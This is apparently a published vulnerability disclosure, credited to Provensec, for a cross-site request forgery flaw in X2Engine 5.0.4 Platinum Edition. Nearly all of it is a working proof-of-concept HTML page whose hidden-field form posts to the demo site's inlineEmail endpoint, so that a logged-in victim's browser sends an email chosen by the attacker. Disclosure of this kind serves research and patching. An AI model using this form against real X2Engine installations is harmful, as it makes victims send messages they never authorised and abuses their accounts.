# Affected software: x2 engine # Type of vulnerability: csrf # URL: http://demo.x2engine.com # Discovered by: Provensec # Website: http://www.provensec.com #version :*X2Engine 5.0.4 Platinum Edition* # Proof of concept x2 engine was not using any csrf token which causes a csrf issue which an attacker can use to send emails <html> <body> <form action=" http://demo.x2engine.com/index.php/emailInboxes/inlineEmail?ajax=1&postReplace=0&contactFlag=1&skipEvent=0" method="POST"> <input type="hidden" name="InlineEmail&#91;modelId&#93;" value="" /> <input type="hidden" name="associationType" value="EmailInboxes" /> <input type="hidden" name="InlineEmail&#91;modelName&#93;" value="" /> <input type="hidden" name="contactFlag" value="1" /> <input type="hidden" name="InlineEmail&#91;credId&#93;" value="1" /> <input type="hidden" name="InlineEmail&#91;to&#93;" value="test&#64;tes" /> <input type="hidden" name="InlineEmail&#91;cc&#93;" value="" /> <input type="hidden" name="InlineEmail&#91;bcc&#93;" value="" /> <input type="hidden" name="InlineEmail&#91;subject&#93;" value="test&#64;tes" /> <input type="hidden" name="InlineEmail&#91;message&#93;" value="test&#64;tes" /> <input type="hidden" name="InlineEmail&#91;emailInboxesEmailSync&#93;" value="0" /> <input type="hidden" name="InlineEmail&#91;emailInboxesEmailSync&#93;" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>